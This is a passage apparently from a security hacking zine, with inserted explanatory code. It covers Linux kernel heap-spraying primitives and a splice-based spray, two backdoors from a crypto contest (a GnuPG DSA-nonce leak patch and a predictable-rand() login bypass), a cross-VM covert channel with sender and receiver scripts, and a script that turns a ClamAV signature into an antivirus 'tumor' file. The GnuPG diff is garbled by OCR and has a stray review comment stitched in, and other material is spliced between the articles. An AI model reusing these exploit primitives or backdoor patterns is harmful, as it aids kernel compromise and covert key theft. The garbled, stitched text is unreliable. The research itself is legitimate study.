In order to exploit an overflow, you may need to use a particular object of the same cache, or force the
overflow from your SLAB_objectA to a new SLAB_objectB block. In case of UAF, you can also force a whole
particular SLAB block to be freed and reallocate it with another SLAB object. Either of these variants may
be complex and not very stable.

However, not all objects are stored in those kernel caches, and a lot of the useful ones are allocated from 
the default object pool based only on the size of the object, so in the same SLAB you can mix different 
objects. 

Our first useful object for playing with the pool layout is Pipe: 





class CPipeObject :
    public IPoolObj
{
    std::unique_ptr<CPipe> m_pipe;
public:
    operator CPipe*() {
        return m_pipe.get();
    }

    CPipeObject() :
        m_pipe(nullptr) {
    }

    bool Alloc() override {
        m_pipe.reset(new CPipe());
        if (!m_pipe.get())
            return false;
        if (!m_pipe->IsReady())
            return false;

        // Let's cover same SLAB, pipe, and its buffer!
        // fcntl(m_pipe->In(), F_SETPIPE_SZ, PAGE_SIZE * 2);
        return true;
    }

    void Free() override {
        // reset() closes the pipe and so frees the kernel object; release()
        // would only drop the pointer and leak it.
        m_pipe.reset();
    }
};

Another object to look at is TTY: 


class CTtyObject :
    public IPoolObj
{
    CScopedFD m_fd;
public:
    operator int() {
        return m_fd;
    }

    CTtyObject() :
        m_fd(-1)
    {
    }

    bool Alloc() override {
        m_fd.reset(open("/dev/ptmx", O_RDWR | O_NONBLOCK));
        return (-1 != m_fd);
    }

    void Free() override {
        m_fd.reset();
    }
};

Another one that comes to mind is Socket: 





class CSocketObject :
    public IPoolObj
{
    CScopedFD m_sock;
public:
    operator int() {
        return m_sock;
    }

    CSocketObject() :
        m_sock(-1)
    {
    }

    bool Alloc() override {
        m_sock.reset(socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP));
        return (-1 != m_sock.get());
    }

    void Free() override {
        m_sock.reset();
    }
};

However, in our implementations we only play with allocations of sizes sizeof(Pipe), sizeof(TTY),
sizeof(Socket), but not with their associated buffers for the Pipe, TTY, or Socket objects respectively.
Therefore, here we omit doing the equivalent of memcpy, but you can ship your controlled data to kernel 
memory through the write syscall, which will store it there faithfully byte-for-byte. 
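The two facts the last paragraphs rely on, that generic kmalloc caches are chosen by size alone so unrelated objects mix in one SLAB, and that a pipe's buffer ring can be steered into a chosen cache with F_SETPIPE_SZ, can be worked through in plain C. The following is an added example, not code from the article; the cache sizes (8 through 8192 with the 96 and 192 classes) and sizeof(struct pipe_buffer) == 40 are assumptions for an x86-64 SLUB kernel of that era and should be checked against /proc/slabinfo on the kernel at hand. `pipe_pages_for_cache` plays the role of the `KmallocIndexByPipe` helper the text refers to.

```c
#include <stddef.h>
#include <stdio.h>

/* Generic kmalloc size classes of an x86-64 SLUB kernel of the period the
 * article targets. Assumed values; the set of caches depends on kernel
 * version and configuration, so verify against /proc/slabinfo. */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};
#define N_CLASSES (sizeof kmalloc_classes / sizeof kmalloc_classes[0])

/* Smallest generic cache that holds `size` bytes, or 0 when the request is
 * larger than the largest generic cache (those go to the page allocator). */
size_t kmalloc_cache_size(size_t size) {
    for (size_t i = 0; i < N_CLASSES; i++)
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}

/* Assumed sizeof(struct pipe_buffer) on x86-64: page pointer, offset, len,
 * ops pointer, flags (+ padding), private. */
#define PIPE_BUFFER_SIZE 40

/* pipe_set_size() rounds the requested page count up to a power of two. */
static unsigned round_up_pow2(unsigned n) {
    unsigned p = 1;
    while (p < n) p <<= 1;
    return p;
}

/* Cache that the pipe's buffer ring lands in when F_SETPIPE_SZ asks for
 * `pages` pages: the kernel allocates pages * sizeof(struct pipe_buffer). */
size_t pipe_ring_cache_size(unsigned pages) {
    return kmalloc_cache_size((size_t)round_up_pow2(pages) * PIPE_BUFFER_SIZE);
}

/* The lookup the text's KmallocIndexByPipe() stands for: how many pages to
 * request so that the ring shares a cache with an object of `target_size`
 * bytes. Returns 0 when no power-of-two ring size hits that cache, which is
 * the failure case the Linux Alloc() guards with `if (!shift)`. */
unsigned pipe_pages_for_cache(size_t target_size) {
    size_t want = kmalloc_cache_size(target_size);
    if (want == 0)
        return 0;
    for (unsigned pages = 1; pages <= 4096; pages <<= 1)
        if (pipe_ring_cache_size(pages) == want)
            return pages;
    return 0;
}

int main(void) {
    size_t sizes[] = { 40, 100, 192, 700, 1500 };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        size_t s = sizes[i];
        printf("object of %4zu bytes -> kmalloc-%zu, pipe ring of %u pages lands there\n",
               s, kmalloc_cache_size(s), pipe_pages_for_cache(s));
    }
    return 0;
}
```

Read the other way round, the same table tells a defender which unrelated objects sit next to a given cache when a corruption in it is reported: a 700-byte object and a 16-page pipe ring are neighbours in kmalloc-1024, while nothing a pipe ring can do reaches kmalloc-128.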

Here is an example with Pipe. It is similar to the Windows example. In Windows we use the WriteFile
API, but in the Linux implementation we have to use CPipe::Write, like in this example with the fcntl syscall:








class CPipeBufObj :
    public IPoolBuf
{
    CPipe m_pipe;
public:
    size_t Alloc(void* mem, size_t size) override {
        auto shift = KmallocIndexByPipe(size);
        if (!shift)
            return 0;   // no pipe buffer count maps to this kmalloc size
        if (-1 == fcntl(m_pipe.In(), F_SETPIPE_SZ, PAGE_SIZE * shift))
            return 0;
        if (!m_pipe.Write(mem, size))
            return 0;
        return size;
    }

    void Free() override {
        m_pipe.reset();
    }
};

One of the reasons why we focus mainly on object
header-based kmallocs is that in Linux the objects we
deal with are easy to overwrite, have a lot of pointers
and useful state we can manipulate, and are often quite
large. For example, they may cover different SLABs,
and may even be located in the same SLAB as various
kinds of buffers that make pretty sexy targets. One
more reason is covered later in this article.

However, pool layout is a far more difficult task than
described above, as randomization complicates it to a
large extent. You can usually overcome it with spray-
ing in the same cache and filling most of the pool to
ensure that almost every object there can be used for
exploitation (as due to randomization you don't know
where your target will reside).
[Figure: SLAB layout in the kernel address space (0xee07... to 0xffff...), latest SLAB highlighted; legend: Victim (buffer overflowing), Target (overflowed to), Target (decoy)]

Sometimes by trying to do this kind of pool layout with overflowable buffer and right object headers you 
can achieve full pwn even without touching addr_limit. 
Pool spray brute force implementation: 


template<typename t_PoolObjType, bool FIFO>
size_t
Spray(
    size_t objLimit
    )
{
    for (size_t n_obj_id = 0; n_obj_id < objLimit; n_obj_id++) {
        std::unique_ptr<IPoolObj> pool_obj(new t_PoolObjType());
        if (!pool_obj) // not enough memory on heap ?
            break;
        if (!pool_obj->Alloc()) // not enough memory on pool ?
            break;
        if (FIFO)
            BILIST::push_back(*static_cast<t_PoolObjType*>(pool_obj.release()));
        else
            BILIST::push_front(*static_cast<t_PoolObjType*>(pool_obj.release()));
    }
    return BILIST::size();
}

But as we mentioned before, a big drawback to effective pool spraying on Linux and to doing a massive 
controllable pool layout is the limit on the number of owned kernel objects per process. You can create a 
lot of processes to overcome it, but that is bit messy, does not always properly solve your issue, or is not 
possible anyway. 

Spray by GFP_USER zone:

To overcome this limitation and to control more of the kernel memory (zone GFP_USER) state, we came
up with a somewhat more comprehensive solution presented at Confidence 2015.15
To understand this technique, we will need to take a closer look at the splice method.





ssize_t default_file_splice_read(struct file *in, loff_t *ppos,
                                 struct pipe_inode_info *pipe, size_t len,
                                 unsigned int flags)
{
        unsigned int nr_pages;
        unsigned int nr_freed;
        size_t offset;
        struct page *pages[PIPE_DEF_BUFFERS];
        /* ... */
        struct splice_pipe_desc spd = {
                .pages = pages,
                .partial = partial,
                .nr_pages_max = PIPE_DEF_BUFFERS,
                .flags = flags,
                .ops = &default_pipe_buf_ops,
                .spd_release = spd_release_page,
        };
        /* ... */
        for (i = 0; i < nr_pages && i < spd.nr_pages_max && len; i++) {
                struct page *page;

                page = alloc_page(GFP_USER);
                /* ... */

15 SPLICE When Something is Overflowing by Peter Hlavaty, Confidence 2015





As you can see from this highlight, the important piece is alloc_page(GFP_USER), which allocates a page of
PAGE_SIZE that is filled with controlled content later. This is nice, but we still have a limit on pipes!

Now here is a paradox: sometimes randomization can play into your hands!

And that's our case... In other words, when you do splice multiple (really a lot of) times, you will cover
a lot of random pages in the kernel's virtual address space. But that's exactly what we want!

But to trigger default_file_splice_read you need to provide the appropriate pipe counterpart to
splice, and one of the kosher candidates is /dev/ptmx a.k.a. TTY. And as splice is for moving content
around, you will need to perform a few steps to achieve a successful spray algorithm:


* no memory pressure!
* allow spray with only 0x1fd pipes!

[Figure: the splice spray cycle. User mode: controlled data 1, 2, 3 is written to the TTY slave; the TTY master is spliced into the pipe and read back out of the pipe. Kernel mode: each round leaves a BUFFER in kernel memory holding controlled data 1, 2, 3.]

You will need to (1) fill tty slave; (2) splice tty master to pipe in; (3) read it out from pipe out; and (4) go
back to (1).

In conclusion, we consider kmalloc with per-byte-controlled content, and kfree controllable by the user to
that extent, very damaging for overall kernel security and for the mitigations that have been introduced. And
we believe that this power will someday be stripped from the user, thereby making exploitation of otherwise
difficult-to-exploit vulnerabilities harder.

By the way, in this article we do not discuss kernel memory control by the ret2dir technique.16 For additional
info and practical usage, check our (@antlr7 of @K33nTeam) research from BHUS15.17

16 ret2dir: Rethinking Kernel Isolation by Kemerlis, Polychronakis, and Keromytis
17 Universal Android Rooting is Back! by Wen Xu, BHUSA 2015
   unzip pocorgtfo09.pdf bhusa15wenxu.pdf
5 Second Underhanded Crypto Contest


Defcon 23's Crypto and Privacy Village mini- 
contest is over. Despite the tight deadline, we re- 
ceived five high-quality submissions in two cate- 
gories. The first was to patch GnuPG to leak the 
private key in a message. The second was to back- 
door a password authentication system, so that a 
secret value known to an attacker could be used in 
place of the correct password. 


5.1 GnuPG Backdoor


We had three submissions to the GnuPG category. 
The winner is Joseph Birr-Pixton. The submission 
takes advantage of how GnuPG 1.4 generates DSA 
nonces. 

The randomness of the DSA nonce is crucial. 
If the nonce is not chosen randomly, or has low 
entropy, then it is possible to recover the private 
key from digital signatures. GnuPG 1.4 generates 
nonces by first generating a random integer, set- 
ting the most-significant bit, and then checking if 
the value is less than a number Q (a requirement of 
DSA). If it is not, then the most-significant 32 bits 
are randomly generated again, leaving the rest the 
same. 

This shortcut enables the backdoor. The patch 
looks like an improvement to GnuPG, to make it 
zero the nonce after it is no longer needed. Unfor- 
tunately for GnuPG, but fortunately for this con- 
test, there's an extra call to memset() that zeroes 
the nonce in the “greater than Q” case, meaning the
nonce that actually gets used will only have 32 bits 
of entropy. The attacker can fire up some EC2 in- 
stances to brute force it and recover the private key. 







diff — git a/cipher/dsa.c b/cipher/dsa.c 


index e23f05c..e496d69 100644 
—— a/cipher/dsa.c 

++ b/cipher/dsa.c 

ад —93,6 +93,7 aa gen k( MPI q ) 


if( !rndbuf || nbits < 32 ) { 
— if (rndbuf) memset(rndbuf, 0, nbytes); 
xfree(rndbuf); 
rndbuf = get random bits(nbits, 1, 1); 


} 
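Review bot: the added `if (rndbuf) memset(rndbuf, 0, nbytes);` before `xfree(rndbuf);` is the harmless part of this patch: it only scrubs a buffer that is about to be freed and replaced by a fresh `get_random_bits(nbits, 1, 1)`. It does nothing to justify the zeroing added to the retry branches in the next hunk, which need to be reviewed on their own.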
@@ —115,15 +116,18 @@ gen k( MPI q ) 


if( !(mpi emp( k, q ) « 0) ) ( //k«q 
if( DBG CIPHER ) 


18 unzip pocorgtfo09.pdf uhc-subs.tar.xz

by Taylor Hornby


progress( 4-7); 
memset ( rndbuf , 
continue; /* по 


0, nbytes); 


*/ 


) 
if( !(mpi cmp ш( К, 0 ) > 0) )( //k»0 
if( DBG CIPHER 
progress(’—’) 
memset (rndbuf , 
continue; //no 


) 
0, nbytes); 


) 
break; //okay 


0, nbytes); 


memset (rndbuf , 
х Ёгее (rndbuf) ; 
if(DBG CIPHER) 

progress(’\n’); 





5.2 Backdoored Password Authentication


There were two entries to the password authenti- 
cation category. The winner is Scott Arciszewski. 
This submission pretends to be a solution to a user 
enumeration side channel in a web login form. The 
problem is that if the username doesn’t exist, the lo- 
gin will fail fast. If the username does exist, but the 
password is wrong, the password check will take a 
long time, and the login will fail slow. This way, an 
attacker can check if a username exists by measuring 
the response time. 

The fix is to, in the username-does-not-exist 
case, check the password against the hash of a ran- 
dom garbage value. The garbage value is gener- 
ated using rand(), a random number generator that
is not cryptographically secure. Some rand() out- 
put is also exposed to the attacker through cache- 
busting URLs and CSRF tokens. With that output, 
the attacker can recover the internal rand() state, 
predict the garbage value, and use it in place of the 
password. 
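The failure mode described here, a timing fix whose dummy comparison is allowed to decide the outcome, next to the shape that fixes the side channel without opening a second door. This is an added C example written for this page, not the contest entry's code: the "slow hash" is a toy with a fixed cost (assumed stand-in for a real KDF), the single-user table is constructed sample data, and "recovering the rand() state" is modelled simply as knowing the seed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy stand-in for a slow password hash, assumed for this demo only (not a
 * real KDF). It burns a fixed amount of work so that every call costs the
 * same, which is the timing property the contest entry's "fix" was after. */
static uint64_t toy_slow_hash(const char *s) {
    uint64_t h = 1469598103934665603ULL;
    for (; *s; s++) {
        h ^= (unsigned char)*s;
        h *= 1099511628211ULL;
    }
    for (int i = 0; i < 200000; i++)          /* fixed cost, independent of input */
        h = h * 6364136223846793005ULL + 1442695040888963407ULL;
    return h;
}

/* One-user table with constructed sample data, filled on first use. */
struct user { const char *name; uint64_t hash; };
static struct user users[1];
static uint64_t dummy_hash;

static void init_users(void) {
    users[0].name = "alice";
    users[0].hash = toy_slow_hash("correct horse");
    /* Fixed dummy for the unknown-user path. It need not be secret, because
     * login_fixed() never lets a match against it count as success. */
    dummy_hash = toy_slow_hash("unknown-user-dummy");
}

static const struct user *lookup(const char *name) {
    if (users[0].name == NULL)
        init_users();
    for (size_t i = 0; i < sizeof users / sizeof users[0]; i++)
        if (strcmp(users[i].name, name) == 0)
            return &users[i];
    return NULL;
}

/* The backdoored pattern: for an unknown user, hash a garbage password drawn
 * from rand() and let that comparison decide the outcome. */
void garbage_from_rand(char *out, size_t n) {
    for (size_t i = 0; i < n; i++)
        out[i] = (char)('a' + rand() % 26);
    out[n] = '\0';
}

int login_backdoored(const char *name, const char *password) {
    const struct user *u = lookup(name);
    if (u == NULL) {
        char garbage[17];
        garbage_from_rand(garbage, 16);       /* rand() state is recoverable from other outputs */
        return toy_slow_hash(password) == toy_slow_hash(garbage);
    }
    return toy_slow_hash(password) == u->hash;
}

/* The safe shape: same work on both paths, a fixed dummy hash when the user
 * is missing, and the result forced to "no" in that case. */
int login_fixed(const char *name, const char *password) {
    const struct user *u = lookup(name);
    uint64_t expected = u ? u->hash : dummy_hash;
    int match = (toy_slow_hash(password) == expected);
    return (u != NULL) && match;
}

/* Demo: someone who has recovered the rand() state (modelled as knowing the
 * seed) computes the garbage value ahead of time. Returns the login result
 * for a non-existent user presenting that value. */
int predicted_garbage_logs_in(unsigned seed, int (*login)(const char *, const char *)) {
    char predicted[17];
    srand(seed);
    garbage_from_rand(predicted, 16);         /* the prediction */
    srand(seed);                              /* server's rand() state at login time */
    return login("nobody", predicted);
}

int main(void) {
    printf("backdoored login with predicted garbage: %d\n",
           predicted_garbage_logs_in(1234, login_backdoored));
    printf("fixed login with predicted garbage:      %d\n",
           predicted_garbage_logs_in(1234, login_fixed));
    printf("fixed login, alice / correct horse:      %d\n",
           login_fixed("alice", "correct horse"));
    return 0;
}
```

The point of `login_fixed` is the last line: the dummy comparison is performed only to keep the timing flat, and its result is discarded. Once that is true, the dummy value's predictability stops mattering, so no CSPRNG is needed for it at all.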


An archive with all of the entries is included
within this PDF.18 The judge for this competition
was Jean-Philippe Aumasson, to whom we extend
our sincerest thanks.
6 Exploiting Out-of-Order-Execution; or,
Processor Side Channels to Enable Cross VM Code Execution

by Sophia D'Antoine

In which Sophia uses the MFENCE instruction on virtual machines,
just as Joshua used trumpets on the walls of Jericho. —PML


At REcon 2015, I demonstrated a new hard-
ware side channel that targeted co-located virtual 
machines in the cloud. This attack exploited the 
CPU’s pipeline as opposed to cache tiers, which are 
often used in side channel attacks. When design- 
ing or looking for hardware-based side channels— 
specifically in the cloud, I analyzed a few universal 
properties that define the “right” kind of vulnerable 
system as well as unique ones tailored to the hard- 
ware medium. 

The relevance of these types of attacks will only 
increase—especially attacks that target the vulnera- 
bilities inherent to systems that share hardware re- 
sources, such as in cloud platforms. 





Figure 1: Virtualization of physical resources (per-core L1 and L2 caches shown; figure not reproduced)


6.1 What is a Side Channel Attack? 


Basically a side channel is a way for any meaning-
ful information to be leaked from the environment 
running the target application, or in this case the 
victim virtual machine (as in Figure 6). In this case, 
a process (the attacker) must be able to repeatedly 
record this environment “artifact” from inside one 
virtual machine. 
In the cloud, this environment is the shared
physical resources on the service used by the vir- 
tual machines. The hypervisor dynamically parti- 
tions each physical resource—which is then seen by 
a single virtual machine as its own private resource. 
The side channel model in Figure 6.1 illustrates this. 

Knowing this, the attacker can affect that re- 
source partition in a recordable way, such as by 
flushing a line in the cache tier, waiting until the vic- 
tim process uses it for an operation, then requesting 
that address again—recording what values are now 
there. 







Figure 2: Side channel model (victim: leaves artifacts; adversary: records artifacts)


6.2 What Good is a Side Channel Attack?


Great! So we can record things from our victim's 
environment—but now what? Of course, some kinds 
of information are better than others; here is an 
overview of the different kinds of attacks people have 
considered, depending on what the victim's process 
is doing. 

Crypto key theft. Crypto keys are great, pri- 
vate crypto keys are even better. Using this hard- 
ware side channel, it's possible to leak the bytes of 
the private key used by a co-located process. In 
one scenario, two virtual machines are allocated the 
same space in the L3 cache at different times. The 
attacker flushes a certain cache address, waits for the 


victim to use that address, then queries it again— 
recording the new values that are there.[1]

Process monitoring. What applications is the
victim running? It will be possible to find out when
you record enough of the target's behavior, i.e., its
CPU or pipeline usage or values stored in memory.
Then a mapping between the recording and a spe-
cific running process could be constructed—up to
some varied degree of certainty. Warning, this does
rely on at least a rudimentary knowledge of machine
learning.





Environment keying. This attack is handy for 
proving co-location. Using the environment record- 
ings taken off of a specific hardware resource, you 
can also uniquely identify one server from another 
in the cloud. This is useful to prove that two virtual 
machines you control are co-resident on the same 
physical server. Alternatively, if you know the be- 
havior signature of a server your target is on, you 
can repeatedly create virtual machines in the tar- 
geted cloud, recording the behavior on each system 
until you find a match.[2]

Broadcast signal. This attack is a nifty way
of receiving messages without access to the Internet.
If a colluding process is purposefully generating be-
havior on a pre-arranged hardware resource, such
as purposefully filling a cache line with 0's and 1's,
the attacker (your process) can record this behav-
ior in the same way it would record a victim's be-
havior. You then can translate the recorded values
into pre-agreed messages. Recording from different
hardware mediums results in a channel with differ-
ent bandwidths.[3]


6.3 The Cache is Easy; 
the Pipeline is Harder 


Now all of the above examples used the cache to 
record the environment shared by both victim and 
attacker processes. It is the most widely used re- 
source in both literature and practice for construct- 
ing side channels, as well as the easiest one to record 
artifacts from. Basically, everyone loves cache. 
However, the cache isn't the only shared re- 
source. Co-located virtual machines also share the 
CPU execution pipeline, as illustrated in Figure 3. 
In order to use the CPU pipeline, we must be able 
to record a value from it. Unfortunately, there is no 
easy way for any process to query the state of the 
pipeline over time—it is like a virtual black-box.
The only thing a process can know is the instruc-
tion set order it gives to be executed on the pipeline
and the result the pipeline returns. This is the infor- 
mation source we will mine for a number of effects 
and artifacts, as follows. 


Out of order execution: a pipeline's arti-
fact. We can exploit this pipeline optimization as
a means to record the state of the pipeline. The
known input instruction order will result in two dif-
ferent return values—one is the expected result(s),
the other is the result if the pipeline executes them
out-of-order.

Figure 3: Foreign processes can share the same pipeline (figure not reproduced; its labels read "Processor01" and "SMT allows threads to ...")
Strong memory ordering. Our target,
cloud processors, can be assumed to be x86/64 
architecture—implying a usually strongly-ordered 
memory model.[4] This is important, because the
pipeline will optimize the execution of instructions, 
but will attempt to maintain the right order of stores 
to memory and loads from memory. 





However, the stores and loads from different 
threads may be reordered by out-of-order-execution. 
Now, this reordering is observable if we're clever 
enough. 








Recording instruction reorder (or, how to 
be clever). In order for the attacker to record 
these reordering artifacts from the pipeline, we must 
record two things for each of our two threads: input 
instruction order and return value. 





Additionally, the instructions in each thread 
must contain a STORE to memory and a LOAD from 
memory. The LOAD from memory must reference the 
location stored to by the opposite thread. This setup 
ensures the possibility for the four cases illustrated 
in Figure 4. The last is the artifact we record; do- 
ing so several thousand times gives us averages over 
time. 





                  THREAD 1          THREAD 2
Synched           store [X], 1      store [Y], 1       -> r1 = 1, r2 = 1
                  load r1, [Y]      load r2, [X]

Asynched          store [X], 1
                  load r1, [Y]      store [Y], 1       -> r1 = 0, r2 = 1
                                    load r2, [X]

Out of order      load r1, [Y]      load r2, [X]       -> r1 = 0, r2 = 0
execution         store [X], 1      store [Y], 1

Figure 4: The attacker can record when its instruc-
tions are reordered





Sending a message. То make our attacks more 
interesting, we want to be able to force the amount 
of recorded out-of-order-executions. This ability is 
useful for other attacks, such as constructing covert 
communication channels. 

In order to do this, we need to alter how the 
pipeline optimization works—by increasing the prob- 
ability that it either will or will not reorder our two 
threads. The easiest is to enforce a strong memory 
order and guarantee that the attacker will receive 
fewer out-of-order-executions. This is where mem- 
ory barriers come in. 

Memory barriers. In the x86 instruction set,
there are specific barrier instructions that stop the
processor from reordering the four possible combina-
tions of STORE's and LOAD's. What we're interested
in is forcing a strong order when the processor en-
counters an instruction set with a STORE followed by
a LOAD. The MFENCE instruction does exactly this.

By getting the colluding process to inject these 
memory barriers into the pipeline, the attacker en- 
sures that the instructions will not be reordered, 
forcing a noticeable decrease in the recorded aver- 
ages. Doing this in distinct time frames allows us to 
send a binary message, as shown in Figure 5. More 
details are available in my thesis.19








Figure 5: MFENCE ensures the strong memory order on pipeline (figure not reproduced)


The takeaway is that—even with virtualization 
separating your virtual machine from the hundreds 
of other alien virtual machines!—the pipeline can't 
distinguish your process's instructions from all the 
other ones, and we can use that to our advantage. 
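Figure 4 and the memory-barrier paragraph describe the classic store-buffer litmus test, and it can be run on an ordinary machine without any VM: two threads each store to their own location and then load the other's, and the "both loads saw 0" outcome is the reordering artifact the article records; an MFENCE (here the C11 seq_cst fence, which compiles to MFENCE on x86) makes that outcome impossible. The following is an added C example written for this page, not the article's sender/receiver code; it assumes a POSIX system with pthreads. On a single core the fence-less run may legitimately show zero reorders, so the only guaranteed number is the fenced one.

```c
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdio.h>

/* The two shared locations and the two result registers of Figure 4. */
static atomic_int X, Y, r1, r2;
/* Per-round hand-shake between the coordinator and the two threads. */
static atomic_long go;
static atomic_int done1, done2;
static int use_fence;
static long rounds;

/* THREAD 1 of Figure 4: store [X], 1 ; (MFENCE) ; load r1, [Y]. */
static void *thread1(void *unused) {
    (void)unused;
    for (long i = 1; i <= rounds; i++) {
        while (atomic_load(&go) != i) sched_yield();          /* wait for the round */
        atomic_store_explicit(&X, 1, memory_order_relaxed);
        if (use_fence)
            atomic_thread_fence(memory_order_seq_cst);          /* MFENCE on x86 */
        atomic_store_explicit(&r1, atomic_load_explicit(&Y, memory_order_relaxed),
                              memory_order_relaxed);
        atomic_store(&done1, 1);
    }
    return NULL;
}

/* THREAD 2 of Figure 4: store [Y], 1 ; (MFENCE) ; load r2, [X]. */
static void *thread2(void *unused) {
    (void)unused;
    for (long i = 1; i <= rounds; i++) {
        while (atomic_load(&go) != i) sched_yield();
        atomic_store_explicit(&Y, 1, memory_order_relaxed);
        if (use_fence)
            atomic_thread_fence(memory_order_seq_cst);
        atomic_store_explicit(&r2, atomic_load_explicit(&X, memory_order_relaxed),
                              memory_order_relaxed);
        atomic_store(&done2, 1);
    }
    return NULL;
}

/* Runs the pair `n` times and returns how often both loads read 0: the
 * "out of order execution" row of Figure 4, the artifact the attacker records.
 * With `fence` set the store-load reordering is forbidden, so the count is 0. */
long count_reorders(long n, int fence) {
    pthread_t t1, t2;
    long both_zero = 0;
    rounds = n;
    use_fence = fence;
    atomic_store(&go, 0);
    pthread_create(&t1, NULL, thread1, NULL);
    pthread_create(&t2, NULL, thread2, NULL);
    for (long i = 1; i <= n; i++) {
        atomic_store(&X, 0);
        atomic_store(&Y, 0);
        atomic_store(&done1, 0);
        atomic_store(&done2, 0);
        atomic_store(&go, i);                                   /* release the round */
        while (!atomic_load(&done1) || !atomic_load(&done2)) sched_yield();
        if (atomic_load(&r1) == 0 && atomic_load(&r2) == 0)
            both_zero++;
    }
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return both_zero;
}

int main(void) {
    long n = 100000;
    printf("without MFENCE: %ld / %ld rounds reordered\n", count_reorders(n, 0), n);
    printf("with MFENCE:    %ld / %ld rounds reordered\n", count_reorders(n, 1), n);
    return 0;
}
```

The difference between the two printed counts is exactly the signal the article modulates: the colluding sender pushes MFENCEs into the pipeline to pull the reorder count down for one time frame and lets it rise again for the next.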
from time import time, sleep
import os


# takes a binary string as input
def send(Message, roundLength):
    for x in Message:
        if x == '0':
            # Run a single busy loop to represent a 0
            print('sending', x)
            # change the time of this busy loop to match receiver round length
            start_time = time()
            end_time = time() + roundLength  # this number is loop time in seconds
            while start_time < end_time:
                start_time = time()  # do nothing
        else:
            # send a "hi" bit in a given time frame
            # by reducing the received out of order executions
            # this is done using the sender exe
            print('sending', x)
            start_time = time()
            end_time = time() + roundLength
            while start_time < end_time:
                os.system("C:\\CPUSender.exe")
                # do nothing until sending c process terminates
                start_time = time()


def main():
    # measured receiver time frame length in seconds (for one bit)
    roundLength = 1.08
    message = ''
    # enter binary string
    while message != 'exit':
        message = input('Enter Binary String: ')
        start_t = time()
        if message != 'exit':
            send(message, roundLength)
            print("\nTotal execution time: ")
            print(time() - start_t)


if __name__ == "__main__":
    main()

19 unzip pocorgtfo09.pdf crossvm.pdf





# RECEIVER
# sophia.re
# 07/06/15

from time import time, sleep
import os
import sys, subprocess
import msvcrt as m
import matplotlib
import matplotlib.pyplot as plt


def main():
    while True:
        start_time = time()
        end_time = time() + 12
        print("Receiving Bits in Words (8 bit blocks)....\n")
        # records out of order executions and writes averages to file
        p = subprocess.Popen("C:/Receiver.exe")
        while start_time < end_time:
            start_time = time()
            print(time())
        # wait because of system latency
        print("-" * 8)  # this line is partly illegible in the original scan
        p = subprocess.Popen("C:/nop.exe")
        p = subprocess.Popen("C:/nop.exe")
        # read all recorded out of order executions from file
        f = open("C:/Python27/BackupCheck.txt")
        txt = f.readlines()
        f.close()
        txt = txt[0]
        print("Received Bits\n")
        print(txt)
        # trigger a picture to appear
        bits = txt.split("a")
        if "11" in bits[0]:
            print("\n[+] trigger detected")
            exe = "C:/Users/root/Downloads/JPEGView_1_0_29/JPEGView.exe"
            args = "..."  # picture path; illegible in the original scan
            p = subprocess.call([exe, args])
            sys.exit(0)
            quit()
        else:
            print("\n[+] trigger not detected")
        # plot received out of order executions to view step
        print("\n\nEnter to Plot....")
        p.kill()
        m.getch()
        # plot recorded OoOE step signal to png file
        with open("BackupCheck2.txt") as f:
            data = f.read()
        data = data.split("\n")
        y = [float(x) for x in data[0].split(' ')[:-1]]
        x = list(range(len(y)))
        print("There are ", len(y), " elements to plot.")
        fig = plt.figure()
        ax1 = fig.add_subplot(111)
        ax1.set_title("Plot Received OoOE")
        ax1.set_xlabel("iterations")
        ax1.set_ylabel("out-of-order-execution averages")
        ax1.fill_between(x, y, color='yellow')
        ax1.plot(x, y, marker='.', lw=1, label='the data', alpha=0.3)
        leg = ax1.legend()
        plt.savefig('plot.png', bbox_inches='tight')
        # repeat
        print("\n\nEnter to Continue....")
        m.getch()


if __name__ == "__main__":
    main()
7 Antivirus Tumors


McAfee Enterprise VirusScan (not the home version 
of their AV) has a peculiar way of quarantining mal- 
ware. If an anti-virus product wants to keep a foren- 
sic copy of removed malware, it must either move it 
to an area of the system that it doesn't scan, or 
it must somehow transform this malware data so it 
can no longer be seen by the anti-virus signature. 
VirusScan is almost able to get away with the sec- 
ond option. Almost. 





A VirusScan quarantine file (.bup) is an odd 
form of an archive format called Compound File Bi- 
nary Format that can usually be read by 7zip. This 
file contains two files. One of them is a file that con- 
tains metadata on the original malware. The other 
file is the malware file that was removed. Both of 
these files have been XOR encoded with a one byte
key of 0x6a (ASCII ‘j’). This 7zip file is archive
mode only, so it has no compression. All of this is 
extremely useful. 


Let's say that hypothetically all ‘X’ characters
look like malware to our AV. (This is a bit contrived,
but we'll get back to a real example soon.) This X
is 0x58 or 0b01011000. To bitwise XOR this char
with 0x6A would give us ‘2’ (0x32 or 0b00110010).
So our PoC would be ‘X2’ for a signature that looked
for ‘X’. Why? Our tumor has the contents of ‘X2’,
and since that contains ‘X’, it's bad malware and
needs to be quarantined. The file gets XORed to
become '2X' and archived with the metadata. If you
did a hexdump on this forensic .bup file, the con-
tents of ‘2X’ are still visibly malicious and need to
be quarantined!

[hexdump of the forensic .bup file (offsets 0000000 through 00000e0) not reproduced]

by Eric Davisson

I neither have nor want access to McAfee's sig- 
natures, but we all have access to ClamAV's set of 
signatures. It is possible (and highly verified) that 
there is some signature overlap, as files can come 
up dirty on multiple vendors' scans. In this PoC, 
I will use ClamAV's “Worm.VBS.IRC.Alba (Clam)" 
signature. Despite the name, I assure you that if 
you submit the file through McAfee, it scans dirty. 

The following script extracts a plaintext Clam 
signature database, parses out the data of our sig- 
nature, and writes the original and XOR’d form of 
this signature to a file called tumor. This assumes 
you're on a Linux system with ClamAV installed
with signatures loaded in /var/lib/clamav/. 


dd if=/var/lib/clamav/main.cvd of=hivs.tar \
   bs=512 skip=1 2> /dev/null;
tar -x main.db -f hivs.tar 2> /dev/null;
chmod 666 main.db;
rm hivs.tar;
grep "IRC.Alba" main.db \
  | grep -o "[0-9a-f]\+\$" \
  | xxd -r -p | perl -0777 -e \
    '$k = <>; print $k;
     print ($k ^ ("j" x length($k)));' \
  > tumor;
rm main.db





